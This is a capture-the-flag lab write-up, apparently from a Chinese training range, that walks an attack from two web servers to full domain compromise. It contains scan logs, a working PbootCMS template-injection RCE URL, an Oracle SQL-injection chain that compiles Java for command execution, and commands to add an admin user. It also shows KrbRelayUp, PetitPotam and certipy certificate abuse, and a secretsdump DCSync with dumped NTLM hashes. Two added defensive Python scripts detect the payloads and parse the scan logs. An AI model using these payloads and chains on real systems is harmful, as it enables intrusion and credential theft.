春秋云境 - 无间计划 (Chunqiu Cloud Range: the "Wujian Jihua" lab)

Half price on member day, but I played past midnight, damn it, and never got to use the discount. Why does everything after midnight get charged at full price once the half-price window closes... so expensive, ugh.

flag01

Two IPs to start with:


39.98.124.244

39.99.147.240
[2025-03-10 19:37:38] [INFO] 暴力破解线程数: 1
[2025-03-10 19:37:38] [INFO] 开始信息扫描
[2025-03-10 19:37:38] [INFO] 最终有效主机数量: 1
[2025-03-10 19:37:38] [INFO] 开始主机扫描
[2025-03-10 19:37:38] [INFO] 有效端口数量: 233
[2025-03-10 19:37:38] [SUCCESS] 端口开放 39.98.124.244:80
[2025-03-10 19:37:38] [SUCCESS] 端口开放 39.98.124.244:22
[2025-03-10 19:37:38] [SUCCESS] 服务识别 39.98.124.244:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-10 19:37:44] [SUCCESS] 服务识别 39.98.124.244:80 => [http] 版本:1.18.0 产品:nginx 系统:Linux 信息:Ubuntu
[2025-03-10 19:37:47] [INFO] 存活端口数量: 2
[2025-03-10 19:37:48] [INFO] 开始漏洞扫描
[2025-03-10 19:37:48] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-03-10 19:37:48] [SUCCESS] 网站标题 http://39.98.124.244 状态码:200 长度:481 标题:Search UserInfo
[2025-03-10 19:38:12] [SUCCESS] 扫描已完成: 3/3

[2025-03-10 19:38:58] [INFO] 暴力破解线程数: 1
[2025-03-10 19:38:58] [INFO] 开始信息扫描
[2025-03-10 19:38:58] [INFO] 最终有效主机数量: 1
[2025-03-10 19:38:58] [INFO] 开始主机扫描
[2025-03-10 19:38:58] [INFO] 有效端口数量: 233
[2025-03-10 19:38:58] [SUCCESS] 端口开放 39.99.147.240:22
[2025-03-10 19:38:58] [SUCCESS] 端口开放 39.99.147.240:80
[2025-03-10 19:38:58] [SUCCESS] 服务识别 39.99.147.240:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-10 19:39:04] [SUCCESS] 服务识别 39.99.147.240:80 => [http] 版本:1.18.0 产品:nginx 系统:Linux 信息:Ubuntu
[2025-03-10 19:39:08] [INFO] 存活端口数量: 2
[2025-03-10 19:39:08] [INFO] 开始漏洞扫描
[2025-03-10 19:39:08] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-03-10 19:39:08] [SUCCESS] 网站标题 http://39.99.147.240 状态码:200 长度:19781 标题:PbootCMS-永久开源免费的PHP企业网站开发建设管理系统
[2025-03-10 19:39:11] [SUCCESS] 检测到漏洞 http://39.99.147.240:80/www.zip poc-yaml-backup-file 参数:[{path www} {ext zip}]
[2025-03-10 19:39:17] [SUCCESS] 目标: http://39.99.147.240:80
漏洞类型: poc-yaml-pbootcms-database-file-download
漏洞名称:
详细信息:
author:abcRosexyz(https://github.com/abcRosexyz)
links:https://www.cnblogs.com/0daybug/p/12786036.html
[2025-03-10 19:39:19] [SUCCESS] 目标: http://39.99.147.240:80
漏洞类型: poc-yaml-phpstudy-nginx-wrong-resolve
漏洞名称: php
详细信息:
author:LoRexxar(https://lorexxar.cn),0h1in9e(https://www.ohlinge.cn)
links:https://www.seebug.org/vuldb/ssvid-98364
[2025-03-10 19:39:29] [SUCCESS] 扫描已完成: 3/3

Reference: 2021 西湖论剑 (Xihu Lunjian) "plain and simple" web writeup

Grab it and fire it off as-is:

http://39.99.147.240/?a=%7D%7Bpboot%7Buser%3Apassword%7D%3Aif((%22sys%5Cx74em%22)(%22eva%22.%22l('%22.(%22sys%5Cx74em%22)(%22whoami%22).%22')%22))%3B%2F%2F)%7Dxxx%7B%2Fpboot%7Buser%3Apassword%7D%3Aif%7D

vshell came online straight away.

Use this to escalate privileges:

GitHub - Markakd/CVE-2022-2588: exploit for CVE-2022-2588

After escalating there is a `user:user` account; log in to it with su directly.

flag02

[2025-03-10 20:08:58] [INFO] 暴力破解线程数: 1
[2025-03-10 20:08:58] [INFO] 开始信息扫描
[2025-03-10 20:08:58] [INFO] CIDR范围: 172.23.4.0-172.23.4.255
[2025-03-10 20:08:58] [INFO] 生成IP范围: 172.23.4.0.%!d(string=172.23.4.255) - %!s(MISSING).%!d(MISSING)
[2025-03-10 20:08:58] [INFO] 解析CIDR 172.23.4.32/24 -> IP范围 172.23.4.0-172.23.4.255
[2025-03-10 20:08:58] [INFO] 已排除指定主机: 1
[2025-03-10 20:08:58] [INFO] 最终有效主机数量: 255
[2025-03-10 20:08:59] [INFO] 开始主机扫描
[2025-03-10 20:08:59] [SUCCESS] 目标 172.23.4.12 存活 (ICMP)
[2025-03-10 20:08:59] [SUCCESS] 目标 172.23.4.19 存活 (ICMP)
[2025-03-10 20:08:59] [SUCCESS] 目标 172.23.4.51 存活 (ICMP)
[2025-03-10 20:09:02] [INFO] 存活主机数量: 3
[2025-03-10 20:09:02] [INFO] 有效端口数量: 233
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.19:80
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.19:22
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.51:445
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.12:445
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.51:139
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.12:139
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.51:135
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.12:135
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.51:1521
[2025-03-10 20:09:02] [SUCCESS] 服务识别 172.23.4.19:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-10 20:09:07] [SUCCESS] 服务识别 172.23.4.19:80 => [http] 版本:1.18.0 产品:nginx 系统:Linux 信息:Ubuntu
[2025-03-10 20:09:07] [SUCCESS] 服务识别 172.23.4.51:445 =>
[2025-03-10 20:09:07] [SUCCESS] 服务识别 172.23.4.12:445 =>
[2025-03-10 20:09:07] [SUCCESS] 服务识别 172.23.4.51:139 => Banner:[.]
[2025-03-10 20:09:07] [SUCCESS] 服务识别 172.23.4.12:139 => Banner:[.]
[2025-03-10 20:09:07] [SUCCESS] 服务识别 172.23.4.51:1521 =>
[2025-03-10 20:10:07] [SUCCESS] 服务识别 172.23.4.51:135 =>
[2025-03-10 20:10:07] [SUCCESS] 服务识别 172.23.4.12:135 =>
[2025-03-10 20:10:07] [INFO] 存活端口数量: 9
[2025-03-10 20:10:07] [INFO] 开始漏洞扫描
[2025-03-10 20:10:07] [INFO] 加载的插件: findnet, ms17010, netbios, oracle, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-03-10 20:10:07] [SUCCESS] NetInfo 扫描结果
目标主机: 172.23.4.12
主机名: IZMN9U6ZO3VTRNZ
发现的网络接口:
IPv4地址:
└─ 172.23.4.12
└─ 172.24.7.16
[2025-03-10 20:10:07] [SUCCESS] NetBios 172.23.4.51 WORKGROUP\IZS8COQ1QJ2OUAZ
[2025-03-10 20:10:07] [SUCCESS] NetInfo 扫描结果
目标主机: 172.23.4.51
主机名: iZs8coq1qj2ouaZ
发现的网络接口:
IPv4地址:
└─ 172.23.4.51
[2025-03-10 20:10:07] [SUCCESS] NetBios 172.23.4.12 PENTEST\IZMN9U6ZO3VTRNZ
[2025-03-10 20:10:07] [SUCCESS] 网站标题 http://172.23.4.19 状态码:200 长度:481 标题:Search UserInfo
172.23.4.32 external-facing PbootCMS host
172.23.4.12 IZMN9U6ZO3VTRNZ -172.24.7.16
172.23.4.19
172.23.4.51 iZs8coq1qj2ouaZ

39.98.124.244 Oracle

Reference: Oracle SQL injection study notes

Test the columns first:

name=admin' union select 123,'qqq',123 from dual --

Check the version and the username:

name=admin' union select 123,(select user from dual),(SELECT banner FROM v$version where banner like 'Oracle%25') from dual --
# USERINFO
admin' union select 123,(select user from dual),123 from dual --
# Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production
admin' union select 123,(SELECT banner FROM v$version where banner like 'Oracle%25'),123 from dual --
# Create the Java library
admin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual)>1 --
# Grant Java privileges
admin' AND (SELECT dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate '' begin sys.dbms_cdc_publish.create_change_set('''' a'''',''''a'''',''''a''''''''||TEST.pwn()||''''''''a'''',''''Y'''',s ysdate,sysdate);end;''; commit; end;') from dual)>1--
# Create the function
admin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LINXRUNCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual)>1--
# Grant execute privileges on the function
admin' union select null,(select object_name from all_objects where object_name ='LINXRUNCMD' and rownum=1),null from dual--
# Execute
admin' union select null,(select LINXRUNCMD('whoami') from dual),null from dual--

The success rate of this feels really low. Running it a few more times or rebooting the machine a couple of times sorted it out...

Also, a plain dir has problems; commands have to be run through cmd /c:

admin' union select null,(select LINXRUNCMD('cmd.exe /c "dir"') from dual),null from dual--
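From the defender's side, both injection types used so far (the PbootCMS template injection in flag01 and the Oracle UNION / Java-source chain above) are visible in request logs, but only after the encoding layers are peeled off: percent-encoding, the `\x74` escape that hides `system`, and the string concatenation that splits `eval`. The detector below is an added example, not code from this writeup or from any WAF product; the rule names and the `normalize`, `classify` and `scan_requests` functions are my own, and the sample requests are constructed (the first two mirror the payloads quoted in this writeup, the third is a shortened variant, the last two are benign).

```python
import re
import urllib.parse

# Constructed request query strings. Requests 1 and 2 follow the payloads quoted
# in this writeup; request 3 is a shortened constructed variant whose body is
# replaced by "..."; 4 and 5 are ordinary traffic that must not fire.
SAMPLE_REQUESTS = [
    "a=%7D%7Bpboot%7Buser%3Apassword%7D%3Aif((%22sys%5Cx74em%22)(%22eva%22.%22l('%22"
    ".(%22sys%5Cx74em%22)(%22whoami%22).%22')%22))%3B%2F%2F)%7Dxxx%7B%2Fpboot%7Buser%3Apassword%7D%3Aif%7D",
    "name=admin%27%20union%20select%20123,(select%20user%20from%20dual),"
    "(SELECT%20banner%20FROM%20v$version%20where%20banner%20like%20'Oracle%25')%20from%20dual%20--",
    "name=admin%27%20and%20(select%20dbms_xmlquery.newcontext('begin%20execute%20immediate"
    "%20''create%20or%20replace%20and%20compile%20java%20source%20named%20%22X%22%20as%20...'';end;')"
    "%20from%20dual)%3E1%20--",
    "name=admin&page=2",
    "q=system%20status%20report",
]


def normalize(payload: str) -> str:
    """Undo the layers that hide keywords from a naive string match:
    repeated percent-decoding, \\xNN escapes inside literals ("sys\\x74em" ->
    "system"), PHP and Oracle string concatenation ("eva"."l" -> "eval"),
    then case-fold and squeeze whitespace."""
    s = payload
    for _ in range(3):  # tolerate double/triple encoding
        decoded = urllib.parse.unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)
    s = re.sub(r'"\s*\.\s*"', "", s)      # PHP: "eva"."l" -> "eval"
    s = re.sub(r"'\s*\|\|\s*'", "", s)    # Oracle: 'a'||'b' -> 'ab'
    return re.sub(r"\s+", " ", s).lower()


# Each rule is (name, compiled regex applied to the normalized text). Ordered so
# that classify() returns findings in a stable, predictable sequence.
RULES = [
    ("pbootcms-template-injection", re.compile(r"\{pboot\{user:password\}:if\(")),
    ("php-dangerous-function",
     re.compile(r"\b(system|eval|passthru|shell_exec)\b\s*[\"']?\s*\)?\s*\(")),
    ("oracle-java-source-injection", re.compile(r"create or replace and compile java source")),
    ("oracle-dbms_xmlquery-exec", re.compile(r"dbms_xmlquery\.newcontext")),
    ("oracle-external-java-function", re.compile(r"language java name")),
    ("oracle-version-fingerprint", re.compile(r"v\$version")),
    ("sql-union-dual", re.compile(r"union\s+select\b.*\bfrom\s+dual")),
]


def classify(payload: str) -> list:
    """Names of every rule that matches the normalized payload."""
    text = normalize(payload)
    return [name for name, rx in RULES if rx.search(text)]


def scan_requests(requests) -> dict:
    """{index: [rule names]} for each request that trips at least one rule."""
    return {i: hits for i, req in enumerate(requests) if (hits := classify(req))}


if __name__ == "__main__":
    for idx, hits in scan_requests(SAMPLE_REQUESTS).items():
        print(f"request {idx}: {', '.join(hits)}")
```

The decode step is what matters: without the `\x74` unescape and the concatenation collapse, neither `system` nor `eval` appears in request 1, and without percent-decoding the `'` that opens the Oracle injection is still `%27`. The rules themselves are deliberately narrow (`{pboot{user:password}:if(` and `dbms_xmlquery.newcontext` are not things legitimate traffic sends), so they fit as a first-pass alert rather than a blocking filter.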

But this can't bring a beacon online in one click.

Just add a user and try RDP first.

net user natro92 123qwe!@# /add
net localgroup administrators natro92 /add

Probably only port 80 is exposed externally; RDP has to go to the internal port.

Need to connect to 172.23.4.51.

Once connected, the administrator's desktop has a flag and a readme.

Password notes
usera@pentest.me
Admin3gv83

flag03

Only 172.23.4.12 is related to the pentest domain, so test logging in first. RDP login works directly: PENTEST\usera:Admin3gv83

Other people's writeups say KrbRelayUp can be used to escalate here.

KrbRelayUp.exe relay --domain xiaorang.lab --CreateNewComputerAccount --ComputerName test$  --ComputerPassword 123qwe!@#
KrbRelayUp.exe spawn -m rbcd -d xiaorang.lab -dc DC01.xiaorang.lab -cn test$ -cp 123qwe!@#

flag04

172.23.4.12 has a .ssh folder. Its known_hosts contains 172.23.4.19, which means this private key can log in as root on the entry-point web server.

-----BEGIN OPENSSH PRIVATE KEY-----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=
-----END OPENSSH PRIVATE KEY-----

Find a way to connect with the id_rsa; if that really doesn't work, use ssh from the entry host, but note you need an interactive shell to use ssh.

flag05

Back to 172.23.4.12; this machine has two NICs (the second is 172.24.7.16).

Scan it first.

[2025-03-10 22:09:08] [SUCCESS] 目标 172.24.7.23     存活 (ICMP)
[2025-03-10 22:09:08] [SUCCESS] 目标 172.24.7.3 存活 (ICMP)
[2025-03-10 22:09:08] [SUCCESS] 目标 172.24.7.27 存活 (ICMP)
[2025-03-10 22:09:08] [SUCCESS] 目标 172.24.7.43 存活 (ICMP)
[2025-03-10 22:09:08] [SUCCESS] 目标 172.24.7.48 存活 (ICMP)
[2025-03-10 22:09:08] [SUCCESS] 目标 172.24.7.5 存活 (ICMP)
[2025-03-10 22:09:11] [INFO] 存活主机数量: 6
[2025-03-10 22:09:11] [INFO] 有效端口数量: 233
[2025-03-10 22:09:11] [SUCCESS] 端口开放 172.24.7.3:80
[2025-03-10 22:09:11] [SUCCESS] 端口开放 172.24.7.23:80
[2025-03-10 22:09:11] [SUCCESS] 端口开放 172.24.7.23:22
[2025-03-10 22:09:11] [SUCCESS] 端口开放 172.24.7.27:22
[2025-03-10 22:09:11] [SUCCESS] 服务识别 172.24.7.23:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-10 22:09:11] [SUCCESS] 服务识别 172.24.7.27:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-10 22:09:13] [SUCCESS] 端口开放 172.24.7.5:88
[2025-03-10 22:09:13] [SUCCESS] 端口开放 172.24.7.3:88
[2025-03-10 22:09:14] [SUCCESS] 端口开放 172.24.7.3:135
[2025-03-10 22:09:14] [SUCCESS] 端口开放 172.24.7.43:135
[2025-03-10 22:09:14] [SUCCESS] 端口开放 172.24.7.48:135
[2025-03-10 22:09:14] [SUCCESS] 端口开放 172.24.7.5:135
[2025-03-10 22:09:15] [SUCCESS] 端口开放 172.24.7.48:139
[2025-03-10 22:09:15] [SUCCESS] 端口开放 172.24.7.3:139
[2025-03-10 22:09:15] [SUCCESS] 端口开放 172.24.7.5:389
[2025-03-10 22:09:15] [SUCCESS] 端口开放 172.24.7.3:389
[2025-03-10 22:09:15] [SUCCESS] 端口开放 172.24.7.5:139
[2025-03-10 22:09:15] [SUCCESS] 端口开放 172.24.7.43:139
[2025-03-10 22:09:15] [SUCCESS] 端口开放 172.24.7.3:445
[2025-03-10 22:09:16] [SUCCESS] 端口开放 172.24.7.5:445
[2025-03-10 22:09:16] [SUCCESS] 端口开放 172.24.7.48:445
[2025-03-10 22:09:16] [SUCCESS] 端口开放 172.24.7.43:445
[2025-03-10 22:09:16] [SUCCESS] 服务识别 172.24.7.23:80 => [http] 产品:nginx
[2025-03-10 22:09:17] [SUCCESS] 服务识别 172.24.7.3:80 => [http]
[2025-03-10 22:09:18] [SUCCESS] 服务识别 172.24.7.5:88 =>
[2025-03-10 22:09:18] [SUCCESS] 服务识别 172.24.7.3:88 =>
[2025-03-10 22:09:20] [SUCCESS] 服务识别 172.24.7.48:139 => Banner:[.]
[2025-03-10 22:09:20] [SUCCESS] 服务识别 172.24.7.3:139 => Banner:[.]
[2025-03-10 22:09:20] [SUCCESS] 服务识别 172.24.7.3:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: pentest.me, Site: Default-First-Site-Name
[2025-03-10 22:09:20] [SUCCESS] 服务识别 172.24.7.5:139 => Banner:[.]
[2025-03-10 22:09:21] [SUCCESS] 服务识别 172.24.7.43:139 => Banner:[.]
[2025-03-10 22:09:21] [SUCCESS] 服务识别 172.24.7.3:445 =>
[2025-03-10 22:09:21] [SUCCESS] 服务识别 172.24.7.5:445 =>
[2025-03-10 22:09:21] [SUCCESS] 服务识别 172.24.7.48:445 =>
[2025-03-10 22:09:21] [SUCCESS] 服务识别 172.24.7.43:445 =>
[2025-03-10 22:09:25] [SUCCESS] 服务识别 172.24.7.5:389 =>
[2025-03-10 22:09:36] [SUCCESS] 端口开放 172.24.7.23:8060
[2025-03-10 22:09:40] [SUCCESS] 端口开放 172.24.7.27:8090
[2025-03-10 22:09:40] [SUCCESS] 端口开放 172.24.7.27:8091
[2025-03-10 22:09:46] [SUCCESS] 服务识别 172.24.7.23:8060 => [http] 版本:1.20.1 产品:nginx
[2025-03-10 22:09:50] [SUCCESS] 服务识别 172.24.7.27:8091 => [http] Banner:[HTTP/1.1 414 Request-URI Too Long.text is empty (possibly HTTP/0.9)]
[2025-03-10 22:09:51] [SUCCESS] 服务识别 172.24.7.27:8090 => [http]
[2025-03-10 22:09:56] [SUCCESS] 端口开放 172.24.7.23:9094
[2025-03-10 22:10:02] [SUCCESS] 服务识别 172.24.7.23:9094 =>
[2025-03-10 22:10:19] [SUCCESS] 服务识别 172.24.7.3:135 =>
[2025-03-10 22:10:19] [SUCCESS] 服务识别 172.24.7.43:135 =>
[2025-03-10 22:10:19] [SUCCESS] 服务识别 172.24.7.48:135 =>
[2025-03-10 22:10:20] [SUCCESS] 服务识别 172.24.7.5:135 =>
[2025-03-10 22:10:20] [INFO] 存活端口数量: 24
[2025-03-10 22:10:20] [INFO] 开始漏洞扫描
[2025-03-10 22:10:20] [INFO] 加载的插件: findnet, ldap, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-03-10 22:10:20] [SUCCESS] NetInfo 扫描结果
目标主机: 172.24.7.5
主机名: DCadmin
发现的网络接口:
IPv4地址:
└─ 172.25.12.7
└─ 172.24.7.5
[2025-03-10 22:10:20] [SUCCESS] NetInfo 扫描结果
目标主机: 172.24.7.48
主机名: IZAYSXE6VCUHB4Z
发现的网络接口:
IPv4地址:
└─ 172.24.7.48
[2025-03-10 22:10:20] [SUCCESS] 网站标题 http://172.24.7.23 状态码:502 长度:3039 标题:GitLab is not responding (502)
[2025-03-10 22:10:20] [SUCCESS] NetInfo 扫描结果
目标主机: 172.24.7.43
主机名: IZMN9U6ZO3VTRPZ
发现的网络接口:
IPv4地址:
└─ 172.24.7.43
└─ 172.26.8.12
[2025-03-10 22:10:20] [SUCCESS] NetInfo 扫描结果
目标主机: 172.24.7.3
主机名: DC
发现的网络接口:
IPv4地址:
└─ 172.24.7.3
└─ 172.25.12.9
[2025-03-10 22:10:20] [SUCCESS] 网站标题 http://172.24.7.23:8060 状态码:404 长度:555 标题:404 Not Found
[2025-03-10 22:10:20] [SUCCESS] 网站标题 http://172.24.7.3 状态码:200 长度:703 标题:IIS Windows Server
[2025-03-10 22:10:20] [INFO] 系统信息 172.24.7.5 [Windows Server 2016 Standard 14393]
[2025-03-10 22:10:20] [SUCCESS] NetBios 172.24.7.43 PENTEST\IZMN9U6ZO3VTRPZ
[2025-03-10 22:10:20] [SUCCESS] NetBios 172.24.7.48 PENTEST\IZAYSXE6VCUHB4Z
[2025-03-10 22:10:20] [SUCCESS] NetBios 172.24.7.5 DC:DCadmin.pen.me Windows Server 2016 Standard 14393
[2025-03-10 22:10:20] [INFO] 系统信息 172.24.7.3 [Windows Server 2016 Standard 14393]
[2025-03-10 22:10:20] [SUCCESS] NetBios 172.24.7.3 DC:DC.pentest.me Windows Server 2016 Standard 14393
[2025-03-10 22:10:20] [SUCCESS] 网站标题 http://172.24.7.27:8090 状态码:302 长度:0 标题:无标题 重定向地址: http://172.24.7.27:8090/login.action?os_destination=%2Findex.action&permissionViolation=true
[2025-03-10 22:10:20] [SUCCESS] 网站标题 http://172.24.7.27:8091 状态码:204 长度:0 标题:无标题
[2025-03-10 22:10:20] [SUCCESS] 目标: http://172.24.7.3:80
漏洞类型: poc-yaml-active-directory-certsrv-detect
漏洞名称:
详细信息:
author:AgeloVito
links:https://www.cnblogs.com/EasonJim/p/6859345.html
[2025-03-10 22:10:31] [SUCCESS] 发现指纹 目标: http://172.24.7.27:8090/login.action?os_destination=%2Findex.action&permissionViolation=true 指纹: [ATLASSIAN-Confluence]
[2025-03-10 22:11:23] [SUCCESS] 扫描已完成: 44/44

Run crackmapexec with the petitpotam module to scan:

Reference: 奇安信攻防社区 (Qi An Xin attack and defense community): analysis of the PetitPotam vulnerability (CVE-2021-36942)

crackmapexec.exe smb 172.24.7.1/24 -u "usera" -p "Admin3gv83" -M petitpotam

But it seems this doesn't lead anywhere afterwards.

Most people hit this with CVE-2022-26923. But the one above can be used for a quick first look (it was already used once in the 春秋云境 - 2022 网鼎杯 semifinal review).

172.24.7.5 DCadmin.pen.me
172.24.7.48 IZAYSXE6VCUHB4Z.pentest.me
172.24.7.16 IZMN9U6ZO3VTRNZ.pentest.me
172.24.7.3 DC.pentest.me
172.24.7.43 IZMN9U6ZO3VTRPZ.pentest.me
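The inventory above (and the one compiled after the flag02 scan) was assembled by hand from the scanner log. As an added example that is not part of the original writeup, here is a small parser for that log format which builds the same inventory automatically and flags multi-homed hosts, which are the pivot points between segments that a defender most wants to know about. The sample log lines are constructed in the same shape as the output quoted above; the addresses (TEST-NET ranges), hostnames and domain name are made up.

```python
import re
from collections import defaultdict

# Constructed sample in the same shape as the scanner output quoted in this
# writeup; timestamps, addresses, hostnames and the domain are made up.
SAMPLE_LOG = """\
[2025-01-01 10:00:00] [SUCCESS] 目标 192.0.2.12 存活 (ICMP)
[2025-01-01 10:00:00] [SUCCESS] 目标 192.0.2.19 存活 (ICMP)
[2025-01-01 10:00:00] [SUCCESS] 目标 192.0.2.51 存活 (ICMP)
[2025-01-01 10:00:01] [SUCCESS] 端口开放 192.0.2.19:80
[2025-01-01 10:00:01] [SUCCESS] 端口开放 192.0.2.19:22
[2025-01-01 10:00:01] [SUCCESS] 端口开放 192.0.2.12:445
[2025-01-01 10:00:01] [SUCCESS] 端口开放 192.0.2.12:135
[2025-01-01 10:00:02] [SUCCESS] 服务识别 192.0.2.19:22 => [ssh] 版本:8.2p1 产品:OpenSSH
[2025-01-01 10:00:02] [SUCCESS] 服务识别 192.0.2.19:80 => [http] 产品:nginx
[2025-01-01 10:00:02] [SUCCESS] 服务识别 192.0.2.12:445 =>
[2025-01-01 10:00:03] [SUCCESS] NetInfo 扫描结果
目标主机: 192.0.2.12
主机名: HOST-A
发现的网络接口:
IPv4地址:
└─ 192.0.2.12
└─ 198.51.100.16
[2025-01-01 10:00:03] [SUCCESS] NetBios 192.0.2.12 EXAMPLE\\HOST-A
[2025-01-01 10:00:03] [SUCCESS] 网站标题 http://192.0.2.19 状态码:200 长度:481 标题:Search UserInfo
"""

IP = r"(\d+\.\d+\.\d+\.\d+)"
ALIVE_RE = re.compile(r"目标 " + IP + r" 存活")
PORT_RE = re.compile(r"端口开放 " + IP + r":(\d+)")
SVC_RE = re.compile(r"服务识别 " + IP + r":(\d+) => \[(\w+)\]")
NETBIOS_RE = re.compile(r"NetBios " + IP + r" ([^\\\s]+)\\(\S+)")
TITLE_RE = re.compile(r"网站标题 http://" + IP + r"(?::(\d+))? .*?标题:(.*)$")
# The NetInfo block is multi-line and carries no timestamp on its inner lines.
TARGET_RE = re.compile(r"^目标主机: (\S+)")
HOSTNAME_RE = re.compile(r"^主机名: (\S+)")
IFACE_RE = re.compile(r"^└─ " + IP)


def new_host():
    return {"hostname": None, "domain": None, "ports": {}, "interfaces": [], "titles": {}}


def parse_scan_log(text: str) -> dict:
    """Fold the scanner log into {ip: host record}."""
    hosts = defaultdict(new_host)
    current = None  # IP whose NetInfo block we are currently inside
    for raw in text.splitlines():
        line = raw.strip()
        if m := TARGET_RE.match(line):
            current = m.group(1)
            hosts[current]  # make sure the record exists
            continue
        if m := HOSTNAME_RE.match(line):
            if current:
                hosts[current]["hostname"] = m.group(1)
            continue
        if m := IFACE_RE.match(line):
            if current and m.group(1) not in hosts[current]["interfaces"]:
                hosts[current]["interfaces"].append(m.group(1))
            continue
        if line.startswith("["):  # any timestamped line ends a NetInfo block
            current = None
        if m := ALIVE_RE.search(line):
            hosts[m.group(1)]
        elif m := PORT_RE.search(line):
            hosts[m.group(1)]["ports"].setdefault(int(m.group(2)), None)
        elif m := SVC_RE.search(line):
            hosts[m.group(1)]["ports"][int(m.group(2))] = m.group(3)
        elif m := NETBIOS_RE.search(line):
            ip, domain, name = m.groups()
            hosts[ip]["domain"] = domain
            hosts[ip]["hostname"] = hosts[ip]["hostname"] or name
        elif m := TITLE_RE.search(line):
            hosts[m.group(1)]["titles"][int(m.group(2) or 80)] = m.group(3)
    return dict(hosts)


def multihomed(hosts: dict) -> dict:
    """Hosts whose NetInfo block lists more than one IPv4 address: these
    straddle two segments and are the pivots a defender should watch."""
    return {ip: h["interfaces"] for ip, h in hosts.items() if len(h["interfaces"]) > 1}


def inventory_table(hosts: dict) -> list:
    """One 'ip  DOMAIN\\hostname  port/service,...' row per host, sorted by IP."""
    rows = []
    for ip in sorted(hosts, key=lambda s: tuple(int(o) for o in s.split("."))):
        h = hosts[ip]
        name = h["hostname"] or "-"
        if h["domain"]:
            name = f"{h['domain']}\\{name}"
        ports = ",".join(f"{p}/{h['ports'][p] or '?'}" for p in sorted(h["ports"]))
        rows.append(f"{ip:<16}{name:<28}{ports}")
    return rows


if __name__ == "__main__":
    inv = parse_scan_log(SAMPLE_LOG)
    print("\n".join(inventory_table(inv)))
    print("multi-homed:", multihomed(inv))
```

Hosts that answered ICMP but exposed no port (192.0.2.51 in the sample) still appear in the inventory, since a silent host on a scanned segment is itself worth a line in the asset list.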

Exploit preconditions:

  1. Able to create a machine account (or control an existing one)
  2. Permission to modify the machine account's attributes
  3. The target is missing the corresponding patch

Create a machine account

certipy account create -u usera@pentest.me -p Admin3gv83 -dc-ip 172.24.7.3 -user 'TEST$' -pass '123qwe!@#' -dns 'DC.pentest.me'

Generate a certificate for the domain admin (this seems unstable; if it fails, try a few more times?)

certipy req -u 'TEST$@pentest.me' -p '123qwe!@#' -ca pentest-DC-CA -dc-ip 172.24.7.3  -template machine -debug

Recover the hash

certipy auth -pfx dc.pfx -dc-ip 172.24.7.3

Got the hash: dc$@pentest.me:aad3b435b51404eeaad3b435b51404ee:1b1e5da161021a928ddb7962ce0e314a

With the DC machine account hash in hand, run a DCSync attack:

secretsdump.py pentest.me/dc$@172.24.7.3 -hashes :1b1e5da161021a928ddb7962ce0e314a -dc-ip 172.24.7.3

Administrator:500:aad3b435b51404eeaad3b435b51404ee:5d0f79eaf7a6c0ad70bcfce6522d2da1:::

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5d0f79eaf7a6c0ad70bcfce6522d2da1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:08b1732d06c09e84119486cbb94a5569:::
